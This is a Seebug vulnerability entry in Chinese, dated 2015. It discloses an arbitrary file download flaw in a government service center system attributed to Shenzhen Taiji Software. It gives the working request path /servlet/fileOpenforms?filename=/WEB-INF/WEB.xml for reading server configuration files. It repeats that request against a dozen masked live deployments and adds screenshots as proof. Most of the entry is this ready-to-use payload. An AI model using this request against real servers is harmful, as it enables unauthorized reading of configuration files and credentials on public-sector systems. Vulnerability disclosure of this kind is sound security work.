某政务服务中心系统通用型任意文件下载

2015-07-16T00:00:00
ID SSV:95814
Type seebug
Reporter Root
Modified 2015-07-16T00:00:00

Description

简要描述:

详细说明:

深圳太极软件有限公司开发系统比较多;这款是政务服务中心系统;存在任意文件下载漏洞;这个系统的案例实在太多,都不需要我多说了~ 任意文件下载:

/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml

Case:

http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8088/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml .....等等

漏洞证明:

Security Testing:

``` 1、

[<img src="https://images.seebug.org/upload/201507/1417125079996340254f54aca1296bb2f859aeb3.png" alt="01.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/1417125079996340254f54aca1296bb2f859aeb3.png)

2、有的也能直接读取

[<img src="https://images.seebug.org/upload/201507/14171257278c26a1b837143bc9671743c7748152.png" alt="02.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/14171257278c26a1b837143bc9671743c7748152.png)

```